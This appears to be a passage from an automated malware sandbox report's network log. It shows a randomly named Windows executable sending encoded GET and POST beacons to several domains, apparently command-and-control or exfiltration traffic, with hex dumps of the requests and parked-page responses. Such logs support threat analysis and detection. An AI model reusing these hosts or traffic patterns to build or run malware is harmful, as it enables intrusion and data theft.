6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 [TRUNCATED] Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.11.20	49747	173.255.194.134	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:31:39.525569916 CET	473	OUT	GET /wie9/?mRu=lL7P/0JUYVbqWckkUFA5AZs0yLHF2CZptxiRtFaWww2Jt1+4Ybj8qDPeqsoco5xM//SPE5hjfF332jPzZ07z97WSr/ctCPXD3Kda+wiI2ZiEZuGqb25QMsE=&UJ=7H1XM HTTP/1.1 Host: www.jigg.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:31:39.659780025 CET	299	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Tue, 12 Nov 2024 14:31:39 GMT content-type: application/octet-stream content-length: 110 content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6a 69 67 67 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 77 77 77 2e 6a 69 67 67 2e 73 70 61 63 65 3c 2f 68 31 3e 3c 70 3e 43 6f 6d 69 6e 67 20 73 6f 6f 6e 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>www.jigg.space</title></head><body><h1>www.jigg.space</h1><p>Coming soon.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.11.20	49748	3.33.130.190	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:31:44.980554104 CET	768	OUT	POST /cbd3/ HTTP/1.1 Host: www.econsultoria.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.econsultoria.online Referer: http://www.econsultoria.online/cbd3/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 4b 55 58 46 64 64 69 6a 63 73 36 51 6c 59 36 6e 67 39 59 30 69 4f 68 49 73 6c 73 72 66 4b 66 49 33 78 42 37 2f 63 48 4e 62 57 79 70 58 50 33 75 5a 30 61 46 71 44 4a 76 74 35 61 37 34 30 54 34 53 46 46 2b 44 33 78 42 57 33 41 44 7a 64 43 72 48 32 46 62 64 6b 69 43 63 33 4a 6e 77 43 70 38 6d 5a 6d 4f 6d 42 39 79 67 30 4e 4a 6a 2f 76 5a 53 46 50 30 54 4d 71 4e 4e 76 66 46 31 65 56 56 36 49 6a 52 6d 65 67 2b 6a 59 6d 64 4a 4a 66 4c 72 6e 59 6b 71 6a 72 34 72 6c 62 33 62 4b 30 53 74 36 78 54 4e 41 61 4d 4f 39 69 46 67 6f 43 4c 4d 47 72 2b 76 4b 7a 62 41 30 6d 39 33 74 75 59 4c 51 3d 3d Data Ascii: mRu=KUXFddijcs6QlY6ng9Y0iOhIslsrfKfI3xB7/cHNbWypXP3uZ0aFqDJvt5a740T4SFF+D3xBW3ADzdCrH2FbdkiCc3JnwCp8mZmOmB9yg0NJj/vZSFP0TMqNNvfF1eVV6IjRmeg+jYmdJJfLrnYkqjr4rlb3bK0St6xTNAaMO9iFgoCLMGr+vKzbA0m93tuYLQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.11.20	49749	3.33.130.190	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:31:47.635078907 CET	788	OUT	POST /cbd3/ HTTP/1.1 Host: www.econsultoria.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.econsultoria.online Referer: http://www.econsultoria.online/cbd3/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 4b 55 58 46 64 64 69 6a 63 73 36 51 6b 35 4b 6e 69 63 59 30 67 75 68 4c 31 56 73 72 4b 61 65 50 33 78 64 37 2f 64 7a 64 63 6a 61 70 58 75 48 75 61 78 75 46 76 44 4a 76 31 70 61 2b 6c 45 54 7a 53 46 5a 4d 44 31 31 42 57 33 38 44 7a 59 2b 72 48 6e 46 59 66 30 69 41 51 58 4a 66 2b 69 70 38 6d 5a 6d 4f 6d 42 70 63 67 30 56 4a 6a 50 2f 5a 51 6b 50 33 51 4d 71 4f 64 2f 66 46 78 65 56 52 36 49 6a 7a 6d 62 4a 70 6a 61 65 64 4a 4d 6a 4c 72 32 59 6e 2f 54 72 2b 6c 46 61 79 59 59 39 31 71 70 6c 73 63 78 75 2f 49 75 53 76 68 2b 50 52 52 30 66 61 73 5a 76 70 45 45 66 56 31 76 76 44 57 5a 41 6c 55 5a 49 52 67 36 79 39 4d 77 67 6b 46 63 45 56 73 44 34 3d Data Ascii: mRu=KUXFddijcs6Qk5KnicY0guhL1VsrKaeP3xd7/dzdcjapXuHuaxuFvDJv1pa+lETzSFZMD11BW38DzY+rHnFYf0iAQXJf+ip8mZmOmBpcg0VJjP/ZQkP3QMqOd/fFxeVR6IjzmbJpjaedJMjLr2Yn/Tr+lFayYY91qplscxu/IuSvh+PRR0fasZvpEEfV1vvDWZAlUZIRg6y9MwgkFcEVsD4=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.11.20	49750	3.33.130.190	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:31:50.291676044 CET	2578	OUT	POST /cbd3/ HTTP/1.1 Host: www.econsultoria.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.econsultoria.online Referer: http://www.econsultoria.online/cbd3/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 4b 55 58 46 64 64 69 6a 63 73 36 51 6b 35 4b 6e 69 63 59 30 67 75 68 4c 31 56 73 72 4b 61 65 50 33 78 64 37 2f 64 7a 64 63 6a 43 70 51 63 50 75 61 57 79 46 6f 44 4a 76 72 35 61 2f 6c 45 54 75 53 46 52 49 44 31 70 37 57 78 34 44 68 4b 6d 72 51 44 5a 59 46 6b 69 41 59 33 4a 6b 77 43 6f 6b 6d 64 43 30 6d 42 35 63 67 30 56 4a 6a 4e 33 5a 55 31 50 33 57 4d 71 4e 4e 76 66 4a 31 65 56 35 36 4d 50 4a 6d 62 46 35 6a 70 57 64 4a 73 54 4c 73 45 77 6e 6a 44 72 38 6f 6c 61 55 59 59 68 71 71 70 70 47 63 79 7a 53 49 73 79 76 6a 5a 7a 4c 46 45 54 33 2f 50 79 6b 46 48 6e 6a 32 75 33 42 54 4b 51 33 45 66 6f 67 6d 38 71 6c 50 32 67 38 43 73 51 42 36 6b 42 52 31 55 36 57 36 63 6b 58 6e 36 72 43 35 4d 56 7a 47 6e 71 65 41 50 64 63 72 77 6a 4a 4f 36 79 2b 37 41 6d 58 36 65 30 51 30 32 2f 42 6d 36 79 53 37 2f 49 61 79 39 39 63 53 71 75 69 47 4c 66 53 71 72 53 4f 30 79 32 79 2b 68 5a 31 61 47 5a 31 72 56 36 6b 42 54 54 2f 46 67 54 2f 70 64 37 39 34 4a 65 6d 75 53 62 56 4a 49 4c 5a 4c 48 4a 76 56 38 33 71 42 67 [TRUNCATED] Data Ascii: mRu=KUXFddijcs6Qk5KnicY0guhL1VsrKaeP3xd7/dzdcjCpQcPuaWyFoDJvr5a/lETuSFRID1p7Wx4DhKmrQDZYFkiAY3JkwCokmdC0mB5cg0VJjN3ZU1P3WMqNNvfJ1eV56MPJmbF5jpWdJsTLsEwnjDr8olaUYYhqqppGcyzSIsyvjZzLFET3/PykFHnj2u3BTKQ3Efogm8qlP2g8CsQB6kBR1U6W6ckXn6rC5MVzGnqeAPdcrwjJO6y+7AmX6e0Q02/Bm6yS7/Iay99cSquiGLfSqrSO0y2y+hZ1aGZ1rV6kBTT/FgT/pd794JemuSbVJILZLHJvV83qBg9Ky6l1l7Wr56rYT25XIYqIKL6RTXYBBH457UlWCWiVOBl5schx4hY+lb8nowKkxzp4P0J1FGSg9clD37Z+izkitT5wUWfO57ieaMaaJhwz83qK44JwMycIfNBit5WckEeaZPu1c8WKJOG7YajjrtwHfN/KxsIs7tvNCQVUSgt7nTRK+J5AeP2qetTdDnyKCtDUGVf/nCwnYpN/PiK/+RIo8rTji49yVBSwO3sJFZrKMETgVzlriys3k1iqd72frc4M3yrjelxtOVGhsT94PgNkBfcRyaQwuOFCuRGnXv/ph19X3bOUGG8hiQrW8o45EhmXJKtOZuO4S/kW9OnbugCIF9zn3xrQPOO2GzIpIjyAcoUwQjcN4/fR7LJaeLon6rWh+Q/511XAt6vqfHAruewkJd86Ez4we8MKiMJfE9bpnObRim3hS/DPpBzre1cv+6qXrgxJEPRE7XaFuYRtxW5u7ZwAcvl4eilqc6z+QFMFnvfVnPuU/Bri3h3ecj2BKJGmYf3ALTm0YCTVPHzK4mt/kVgDjIjr408iHI502zniU4gwJYNfgndfvmJqAxGMhF+DraB6XFP13u1o4G5e2RYho9b5WdBMwfi4CLlZwmNwI3IGtN7SEAnrJoK711B7wxwq/tFi3uNG7/ztF2llbPROkwtelgB2epRo [TRUNCATED]
Nov 12, 2024 15:31:50.291800976 CET	5359	OUT	Data Raw: 71 30 4a 48 30 74 69 52 6d 36 4b 33 35 35 41 73 39 63 48 49 67 36 59 58 4f 62 53 76 6d 4d 6c 31 37 79 53 37 4e 59 45 57 59 43 30 6b 5a 68 75 48 77 68 59 52 2f 77 46 63 4e 42 4a 33 50 76 47 63 77 69 44 2b 72 32 4d 4d 6a 68 71 53 53 42 55 32 2f 64 Data Ascii: q0JH0tiRm6K355As9cHIg6YXObSvmMl17yS7NYEWYC0kZhuHwhYR/wFcNBJ3PvGcwiD+r2MMjhqSSBU2/dHfFogXnBzh4son/31eJEZ7qR1n8RKfiOsvPM1B9RS1IJ54q+Hr/ARyB9bND0QG/HDGs1oW8gYtTnzLbVG5LScsK3etobclDNiIN3pCtzL7KU5cbaBh0hp+BlnAqq37E+FRneJ5zvp6NY/XKXUqv0Ig+HDVZlb7+6b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.11.20	49751	3.33.130.190	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:31:52.944065094 CET	482	OUT	GET /cbd3/?mRu=HW/lerOyVqCXu7n0t/EUlYJ02y1yNdHzoGstxvzncQbYfsbQeR2dtxxMvMPrm1eSchBLBkAlfh8ey4GsUHcWZCjdVQ1E0is8tfiw+yJHiCAhhuX0KyTHXeE=&UJ=7H1XM HTTP/1.1 Host: www.econsultoria.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:31:53.081094980 CET	388	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 12 Nov 2024 14:31:53 GMT Content-Type: text/html Content-Length: 248 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 52 75 3d 48 57 2f 6c 65 72 4f 79 56 71 43 58 75 37 6e 30 74 2f 45 55 6c 59 4a 30 32 79 31 79 4e 64 48 7a 6f 47 73 74 78 76 7a 6e 63 51 62 59 66 73 62 51 65 52 32 64 74 78 78 4d 76 4d 50 72 6d 31 65 53 63 68 42 4c 42 6b 41 6c 66 68 38 65 79 34 47 73 55 48 63 57 5a 43 6a 64 56 51 31 45 30 69 73 38 74 66 69 77 2b 79 4a 48 69 43 41 68 68 75 58 30 4b 79 54 48 58 65 45 3d 26 55 4a 3d 37 48 31 58 4d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mRu=HW/lerOyVqCXu7n0t/EUlYJ02y1yNdHzoGstxvzncQbYfsbQeR2dtxxMvMPrm1eSchBLBkAlfh8ey4GsUHcWZCjdVQ1E0is8tfiw+yJHiCAhhuX0KyTHXeE=&UJ=7H1XM"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.11.20	49752	84.32.84.32	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:31:58.556596041 CET	759	OUT	POST /zis1/ HTTP/1.1 Host: www.webworld.digital Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.webworld.digital Referer: http://www.webworld.digital/zis1/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 77 43 4d 48 2f 7a 38 34 2f 72 34 6c 47 66 6f 68 4b 4b 58 73 7a 56 76 52 43 6c 76 78 65 2f 72 34 5a 38 45 65 6b 66 56 64 4f 44 79 58 76 6b 53 55 39 75 2b 53 67 34 37 45 53 47 4a 71 6e 42 35 49 65 79 4c 47 68 61 76 5a 43 77 78 5a 4d 79 32 31 55 4e 79 6b 77 66 59 7a 34 56 48 59 42 76 67 61 48 67 59 74 69 53 4b 70 2b 69 41 52 61 36 73 68 36 30 74 6b 68 34 36 64 4e 33 4d 4c 42 55 31 57 64 49 39 4f 47 51 70 41 4a 39 31 74 32 78 67 4a 6e 46 36 35 75 2f 55 56 66 4f 5a 62 44 48 6b 64 39 47 4a 62 2b 47 48 48 51 6d 34 44 35 6f 4b 4d 69 61 6b 4a 6e 4a 6e 6d 4b 61 52 4c 63 75 6d 63 74 77 3d 3d Data Ascii: mRu=wCMH/z84/r4lGfohKKXszVvRClvxe/r4Z8EekfVdODyXvkSU9u+Sg47ESGJqnB5IeyLGhavZCwxZMy21UNykwfYz4VHYBvgaHgYtiSKp+iARa6sh60tkh46dN3MLBU1WdI9OGQpAJ91t2xgJnF65u/UVfOZbDHkd9GJb+GHHQm4D5oKMiakJnJnmKaRLcumctw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.11.20	49753	84.32.84.32	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:32:01.329886913 CET	779	OUT	POST /zis1/ HTTP/1.1 Host: www.webworld.digital Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.webworld.digital Referer: http://www.webworld.digital/zis1/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 77 43 4d 48 2f 7a 38 34 2f 72 34 6c 45 2f 34 68 49 74 6a 73 6e 46 76 53 4e 46 76 78 51 66 71 7a 5a 38 59 65 6b 64 35 4e 4f 56 69 58 76 46 43 55 7a 4b 69 53 6a 34 37 45 4b 57 4a 56 71 68 34 6c 65 79 48 67 68 66 48 5a 43 30 68 5a 4d 32 36 31 55 2b 61 6c 78 50 59 78 6a 6c 48 67 4f 50 67 61 48 67 59 74 69 53 65 50 2b 69 6f 52 5a 4c 63 68 31 77 34 57 2f 6f 36 43 45 58 4d 4c 46 55 31 53 64 49 38 62 47 52 46 71 4a 2f 39 74 32 78 77 4a 2b 30 36 36 67 2f 55 58 43 2b 5a 49 53 69 4e 4d 31 43 78 73 2b 33 66 46 65 44 73 62 78 65 48 57 2f 6f 51 74 6b 61 37 55 4f 71 6f 6a 65 73 6e 48 77 79 61 49 36 64 71 78 41 67 61 6b 55 72 35 78 6c 71 5a 4d 39 6d 73 3d Data Ascii: mRu=wCMH/z84/r4lE/4hItjsnFvSNFvxQfqzZ8Yekd5NOViXvFCUzKiSj47EKWJVqh4leyHghfHZC0hZM261U+alxPYxjlHgOPgaHgYtiSeP+ioRZLch1w4W/o6CEXMLFU1SdI8bGRFqJ/9t2xwJ+066g/UXC+ZISiNM1Cxs+3fFeDsbxeHW/oQtka7UOqojesnHwyaI6dqxAgakUr5xlqZM9ms=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.11.20	49754	84.32.84.32	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:32:04.094104052 CET	1289	OUT	POST /zis1/ HTTP/1.1 Host: www.webworld.digital Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.webworld.digital Referer: http://www.webworld.digital/zis1/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 77 43 4d 48 2f 7a 38 34 2f 72 34 6c 45 2f 34 68 49 74 6a 73 6e 46 76 53 4e 46 76 78 51 66 71 7a 5a 38 59 65 6b 64 35 4e 4f 56 71 58 76 31 65 55 38 4c 69 53 74 59 37 45 55 47 4a 75 71 68 34 64 65 79 76 73 68 66 4b 75 43 79 39 5a 4e 56 79 31 63 76 61 6c 37 50 59 78 72 46 48 62 42 76 67 50 48 6d 34 70 69 53 4f 50 2b 69 6f 52 5a 4a 55 68 78 6b 73 57 39 6f 36 64 4e 33 4d 58 42 55 30 50 64 4c 4d 4c 47 52 42 51 49 4f 64 74 33 52 41 4a 6c 69 75 36 6f 2f 55 52 53 75 59 56 53 69 49 55 31 43 46 47 2b 33 62 76 65 45 34 62 79 76 76 4c 6b 64 77 7a 35 70 37 35 4d 70 6f 4a 53 73 33 4b 35 7a 71 74 39 65 43 37 4a 6e 72 38 51 4b 70 71 38 76 41 48 68 6a 66 35 32 74 75 63 71 65 4f 6b 39 53 52 74 71 4b 70 6a 37 67 30 7a 78 46 50 37 37 53 65 62 51 4b 59 6d 55 77 4d 68 4c 78 38 65 42 4f 38 48 6e 7a 4e 67 42 4a 64 55 57 43 44 43 77 71 69 52 72 70 69 50 34 41 2b 6c 57 68 42 42 62 73 5a 50 42 35 4b 36 46 2f 30 6e 61 6c 63 4f 4d 68 6a 2b 31 32 54 67 30 59 64 5a 6d 65 52 62 42 48 2b 39 51 4a 70 69 6a 4f 30 68 54 42 [TRUNCATED] Data Ascii: mRu=wCMH/z84/r4lE/4hItjsnFvSNFvxQfqzZ8Yekd5NOVqXv1eU8LiStY7EUGJuqh4deyvshfKuCy9ZNVy1cval7PYxrFHbBvgPHm4piSOP+ioRZJUhxksW9o6dN3MXBU0PdLMLGRBQIOdt3RAJliu6o/URSuYVSiIU1CFG+3bveE4byvvLkdwz5p75MpoJSs3K5zqt9eC7Jnr8QKpq8vAHhjf52tucqeOk9SRtqKpj7g0zxFP77SebQKYmUwMhLx8eBO8HnzNgBJdUWCDCwqiRrpiP4A+lWhBBbsZPB5K6F/0nalcOMhj+12Tg0YdZmeRbBH+9QJpijO0hTBAFcRNSQl6u5EdBY9+d+YXiq//DPXM71l8WowVaf7ho7r8TRftVx8Tg8e4nuWcwKfa1MrgEV2+dKxXk8LZNJWaCEIQYPC3qSt7oI100UHhIZreWk2iM27zLxZXrcl08ttZNwjua+BPUhl0jwGN9IuoeL6oIOXwEJ5RQC83mTeyplEZ3adfcXpcXmZsdbCeJ5xWXiBaKG+z4UdWpITn+VGsIH/QqX3hVgGO4GJ14/ZTjP94CIyGA43+R/FpulwiVazeAd0D/PXSOfg6rQDEML1fPKlkEVgGnZtSd4yW0wKFrh0nsxB6H/a3m3oexK3pIowJkglevZ+aC9yqmLnPZfoqOC+D6RDwhfo8Beum/3AjYaDy0kWZWj1zqrI9IUlWKd8uZw8hmE
Nov 12, 2024 15:32:04.094151974 CET	1289	OUT	Data Raw: 39 6e 70 47 4e 5a 48 76 35 73 68 36 45 2f 38 46 31 5a 5a 54 75 4a 6d 54 7a 58 6f 42 64 45 68 4f 2b 5a 64 4d 4e 38 77 2b 65 43 51 66 4e 31 61 43 4b 2f 4a 30 67 59 62 4b 2b 4e 72 61 6d 5a 47 32 76 72 71 63 78 38 6d 77 32 34 6c 46 54 69 69 50 76 56 Data Ascii: 9npGNZHv5sh6E/8F1ZZTuJmTzXoBdEhO+ZdMN8w+eCQfN1aCK/J0gYbK+NramZG2vrqcx8mw24lFTiiPvVJU2Vp1ppNgbav94PM6DCPoEt/3ElPIT02jhYxNniesyyIVcJC7YmOCvywSRO3BxbqWObRRitvMJXmkP9/Sgh3IgXACn3aG3RlaCN3faV3yY9LPVljXlWpiIgTZ03IicJ52VsfwCFIw7MAezJ+XVcr2qlLq6ljeQ/m
Nov 12, 2024 15:32:04.094202042 CET	5156	OUT	Data Raw: 2f 31 6c 41 6c 72 77 70 73 42 56 47 4a 6f 63 51 4f 66 39 34 59 6e 4c 4c 4a 39 64 76 39 5a 4f 4b 57 31 48 79 75 79 67 6b 4a 39 54 78 4b 4d 69 6b 70 41 44 77 6c 63 4d 47 4a 6e 43 69 56 6b 63 71 42 34 61 43 42 6d 6a 65 6e 31 45 63 70 64 30 65 38 5a Data Ascii: /1lAlrwpsBVGJocQOf94YnLLJ9dv9ZOKW1HyuygkJ9TxKMikpADwlcMGJnCiVkcqB4aCBmjen1Ecpd0e8ZSfKUgiohbXgZXdkUpE/KS2GhcyJIxSUDpnrvQzKxctDYXBXb6dxiJN07de+A9bKBDqkvIACVmBT1+ictQggLwvopkzCyaQWNIc1+XjHi4iAUPxkCXmdIVM00qIxk93qdEunurx6DXiXYZ30XNyjw8mVNqKXsGzwM7
Nov 12, 2024 15:32:04.094371080 CET	194	OUT	Data Raw: 46 7a 63 62 4b 48 55 50 72 65 42 6b 47 55 4f 47 69 59 41 41 44 48 6f 47 46 34 67 34 58 46 37 34 76 43 75 36 75 35 5a 75 62 42 58 56 74 6e 42 48 4b 58 2b 41 6a 79 4a 6b 6a 55 49 48 34 2f 59 49 77 4c 77 2f 59 6e 6d 59 43 70 7a 4e 39 65 6a 41 52 51 Data Ascii: FzcbKHUPreBkGUOGiYAADHoGF4g4XF74vCu6u5ZubBXVtnBHKX+AjyJkjUIH4/YIwLw/YnmYCpzN9ejARQpD+UID1pu1M46FyFtHSS++yp5UdyUnQt6a1J8aG6I2qUB+NlOWARH/oiGBei1mf/LnbNYgH8kDp0H0mP8Cwx08oZ6svynZJHPV0wwi8Yrx88Cg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.11.20	49755	84.32.84.32	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:32:06.859771013 CET	479	OUT	GET /zis1/?mRu=9Akn8HQ/w9IGHY5hfK3Sz2XWYTq6JbeGUZoZjuxeZl7qmmC+7O6Wru/gQUs9lGhVdHn4ksWgMiMPd3qmb+i3xZVXvSH4PNUsYgsF4Q6R4VB3b48Gv0g7yoc=&UJ=7H1XM HTTP/1.1 Host: www.webworld.digital Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:32:07.100400925 CET	1289	IN	HTTP/1.1 200 OK Server: hcdn Date: Tue, 12 Nov 2024 14:32:06 GMT Content-Type: text/html Content-Length: 9973 Connection: close Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: fc4fc5e78ef2f6c5dcc3a8dcf221be9e-asc-edge5 Expires: Tue, 12 Nov 2024 14:32:05 GMT Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED] Data Ascii: <!doctype html><title>Parked 